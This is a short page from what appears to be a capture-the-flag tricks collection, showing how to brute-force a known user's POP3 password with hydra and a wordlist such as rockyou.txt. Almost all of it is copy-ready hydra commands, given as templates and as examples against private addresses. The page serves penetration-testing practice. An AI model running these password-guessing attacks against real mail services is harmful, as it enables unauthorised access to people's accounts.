> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/bruteforce/mail-service/trick-0208.md).

# Brute-Force POP3 Password

***

You can brute-force a known user's password on a POP3 service using `hydra` with a wordlist.

Simply specify the username (`-l`), the path to your wordlist (`-P`), and the target POP3 service URL including the protocol, IP, and port.

```bash
hydra -l <username> -P <path_to_wordlist> pop3://<target_ip>:<port>/
```

For example, targeting user 'boris' on 192.168.1.100 port 110 with rockyou.txt:

```bash
hydra -l boris -P /usr/share/wordlists/rockyou.txt pop3://192.168.1.100:110/
```

Alternatively, you can specify the target IP and the service name (`pop3`).

```bash
hydra -l <user> -P <passlist> <target> pop3
```

Here are a couple of examples using this syntax:

Targeting user 'user' on 192.168.1.10 with rockyou.txt:

```bash
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.1.10 pop3
```

Targeting user 'admin' on 10.10.10.10 with rockyou.txt:

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 pop3
```

You may also include options like `-t` to specify the number of tasks (threads) to run in parallel and `-vV` for verbose output to see more details during the attack. For POP3, the default port is 110.

```bash
hydra -l <username> -P <path_to_wordlist> -t 16 -vV <target_ip> pop3
```
